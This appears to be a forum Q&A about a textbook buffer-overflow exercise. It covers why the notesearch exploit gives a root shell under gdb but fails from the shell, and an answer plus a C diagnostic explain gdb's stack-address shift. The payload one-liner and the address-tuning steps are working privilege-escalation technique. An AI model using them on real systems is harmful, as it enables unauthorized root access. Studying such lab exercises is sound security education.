Exploit works in gdb but not on the command line
I've been going through "Hacking: The Art of Exploitation" and following the examples. On page 145, the author demonstrates how to exploit the notesearch.c program with shellcode stored in an environment variable. Erickson does this with the following:

./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')

On the command line, this doesn't work for me, but in GDB, typing

run $(perl -e 'print "\x47\xf9\xff\xbf"x40')

does work.

Notes: Now of course, his address above is different than my address due to protections in the CPU, but I just followed his example by running notesearch in gdb, getting the address of the shellcode in the environment variable, and adding 100 to it:

(gdb) x/s 0xbffff8e3 + 100

Of course my address is different than his above, but still, everything checked out, but it didn't work.

BUT

When I run his exploit code in GDB, it works fine:

run $(perl -e 'print "\x47\xf9\xff\xbf"x40')

So why would

run $(perl -e 'print "\x47\xf9\xff\xbf"x40')

work in gdb, and give me a root shell, but

./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')

on the command line won't work? Is address randomization turned off in gdb but not in the OS? Is there a mismatch between what addresses GDB shows and what addresses the program is really running at? Thanks in advance for any guidance.
We don't need to draw on ASLR to explain why "Exploit works in gdb but not on the command line". When running in GDB, the stack location is simply shifted a bit (on my system, 80 bytes down), so the provided address 0xbffff947 needs to be adjusted to work from the shell command line. To verify this, just have a look by putting e.g.

printf("searchstring = %p\n", searchstring);

in notesearch.c; you'll possibly see a constant address every time you run the command from the shell, and another constant address every time you run from GDB.
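As an added illustration of the check this answer suggests (my own diagnostic, not code from the book, the question or the answer), the program below prints a stack address, the address of an environment variable, and how many bytes the argument and environment strings occupy; running it once from the shell and once under gdb shows why the two addresses differ. The variable name SHELLCODE and the 80-byte shift used in the comments are assumptions taken from the book and from this answer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;   /* POSIX: the process environment, laid out at the top of the stack */

/* Bytes occupied by a NULL-terminated array of C strings, each with its
 * terminating NUL. argv[] and environ[] strings live just below the top of
 * the stack, so if gdb adds env vars (LINES, COLUMNS) or a longer argv[0],
 * every stack address below them moves down by about this difference. */
size_t strings_bytes(char *const *vec) {
    size_t total = 0;
    for (; vec && *vec; vec++)
        total += strlen(*vec) + 1;
    return total;
}

/* Signed shift between an address seen under gdb and the same variable's
 * address seen from the shell (negative means the shell run sits lower).
 * Example: address_delta(0xbffff947, 0xbffff8f7) == -80 (the answer's 80-byte shift, assumed). */
long address_delta(unsigned long gdb_addr, unsigned long shell_addr) {
    return (long)shell_addr - (long)gdb_addr;
}

int main(int argc, char *argv[]) {
    char marker;                                   /* a local, so &marker is a stack address */
    const char *sc = getenv("SHELLCODE");          /* name assumed from the book */
    (void)argc;
    printf("argv[0]         = %s\n", argv[0]);
    printf("stack local     = %p\n", (void *)&marker);
    printf("SHELLCODE value = %p\n", (const void *)sc);
    printf("argv strings    = %zu bytes\n", strings_bytes(argv));
    printf("env  strings    = %zu bytes\n", strings_bytes(environ));
    return 0;
}
```

Compare the "argv strings" and "env strings" totals between the shell run and the gdb run; their difference accounts for most of the stack shift, which is why a hard-coded return address found under gdb misses from the shell.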